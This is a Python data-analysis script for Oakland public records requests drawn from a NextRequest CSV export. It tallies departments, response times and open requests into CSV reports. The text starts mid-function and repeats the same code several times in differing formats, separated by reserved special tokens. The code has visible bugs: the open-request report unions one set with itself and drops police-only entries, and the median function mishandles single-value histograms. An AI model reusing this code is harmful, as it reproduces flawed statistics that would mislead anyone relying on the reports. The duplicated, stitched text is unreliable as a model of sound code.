list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, 
openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() <|reserved_special_token_0|> def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): 
prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = 
entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) 
nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): 
allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() def rptOpenPRR(prrTbl, outf): daysOpen = defaultdict(lambda : defaultdict(list)) runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[ 'status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf, 'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday - 1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] outs.write('%s,%d,%d,"%s","%s"\n' % (lbl, len(opdList), len(nonList ), opdList, nonList)) outs.close() def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = 
urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017, 1, 1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent, openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent, createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent, openOPDFile) <|reserved_special_token_1|> <|reserved_special_token_0|> PRRDateFmt = '%Y-%m-%dT%H:%M:%S' PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f' DateTypes = {'date_received': 'recdDate', 'date_created': 'createDate', 'status_updated': 'statusUpDate'} def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order 
of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received', 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact', 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date', 'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company'] DeptNorm = {'Admin: Planning, Building & Neighborhood Preserv': 'Admin: Building Inspection', 'Budget and Fiscal': 'Budget and Revenue - Revenue Division', 'City Attorney Administration Unit': 'City Attorney', 'City Auditor Unit': 'City Auditor', 'City Clerk Unit': 'City Clerk', 'Oakland Police Department': 'Police Department', 'Contracts and Compliance': 'Contracts Compliance', 'Transportation Services - Administration': 'Department of Transportation', 'Fire': 'Fire Department', 'Human Resources Management': 'Human Resources', 'Information Technology (IT)': 'Information Technology', 'Public Works Agency': 'Public Works'} CSVDTFormat = '%m/%d/%Y %H:%M:%S %p' def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = 
[dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def 
normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') 
outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() def rptDeptFreq(prrTbl, deptTbl, startDate, outf): outs = open(outf, 'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept, nrecent)) outs.close() def rptOpenPRR(prrTbl, outf): daysOpen = defaultdict(lambda : defaultdict(list)) runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[ 'status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf, 'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday - 1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] 
outs.write('%s,%d,%d,"%s","%s"\n' % (lbl, len(opdList), len(nonList ), opdList, nonList)) outs.close() def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017, 1, 1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent, openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent, createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent, openOPDFile) <|reserved_special_token_1|> '''harvestPRR: analyze Public 
Record Requests from CSV data provided by NextRequest Created 27 Aug 20 @author: rik@electronicArtifacts.com ''' from collections import defaultdict import csv import datetime import json import random import re import requests import sys import time import urllib import re PRRDateFmt = '%Y-%m-%dT%H:%M:%S' PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f' DateTypes = {'date_received': 'recdDate', 'date_created': 'createDate', 'status_updated': 'statusUpDate'} def freqHist3(tbl): '''python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order ''' from functools import cmp_to_key def cmpd1(a,b): "decreasing order of frequencies" return b[1] - a[1] flist = list(tbl.items()) #python3 flist.sort(key=cmp_to_key(cmpd1)) return flist AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received', 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact', 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date', 'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company'] DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection", "Budget and Fiscal": "Budget and Revenue - Revenue Division", "City Attorney Administration Unit": "City Attorney", "City Auditor Unit": "City Auditor", "City Clerk Unit": "City Clerk", "Oakland Police Department": "Police Department", "Contracts and Compliance": "Contracts Compliance", "Transportation Services - Administration": "Department of Transportation", "Fire": "Fire Department", "Human Resources Management": "Human Resources", "Information Technology (IT)": "Information Technology", "Public Works Agency": "Public Works"} CSVDTFormat = '%m/%d/%Y %H:%M:%S %p' # 07/01/2020 09:54:53 AM def bldIndexTblCSV(inf,startDate=None): 
'''return prrIDTbl, deptTbl ''' prrTbl = {} deptTbl = defaultdict(list) # keep list of all prrIDs statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' # only used in Finance reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace')) for i,entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or \ (startDate != None and prr['createDate'] < startDate): nolder += 1 continue deptStr = entry['Departments'].strip() # NB: multiple department separated by semi-colon if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[ prr['status'] ] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \ (len(prrTbl),len(deptTbl),nmultDept,ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % (nolder)) # freqList = freqHist3(deptTbl) # print('Dept,Freq') # for dept,freq in freqList: # print('"%s",%d' % (dept,freq)) freqList = freqHist3(statusTbl) print('Status,Freq') for status,freq in freqList: print('"%s",%d' % (status,freq)) return (prrTbl, deptTbl) def compHistAvg(hist): '''compute first moment ASSUME hist: value -> freq ''' sum = n = 0 for v in hist.keys(): n += 
hist[v] sum += v * hist[v] return n,float(sum) / n def compMedian(hist): '''compute MEDIAN value ASSUME hist: value -> freq ''' # only singletons thwart the search for half-way point if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n/2.) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl,outf): '''distribution of create dates ''' dateDist = defaultdict(int) nmissdate = 0 for prrID,prr in prrIDTbl.items(): # 180204 # for dtype in DateTypes.values(): # if dtype in prr: # if cdateFnd == None: # cdateFnd = prr[dtype] # else: # if prr[dtype] != cdateFnd: # cdateFnd = min([cdateFnd,prr[dtype]]) cdateFnd = prr['createDate'] if cdateFnd== None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf,'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey,dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\W','_',dept.upper()) def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10): '''Compute average (over previous 90 days) number of days to respond to request Number requests open at month start ''' allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ] allDept.sort() nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq nonOPDopen = defaultdict(int) # month -> freq print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID] for dept in allDept: responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq openReqMon = defaultdict(int) # month -> freq nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] # 180228 # recdDateTime = prr['recdDate'] recdDateTime 
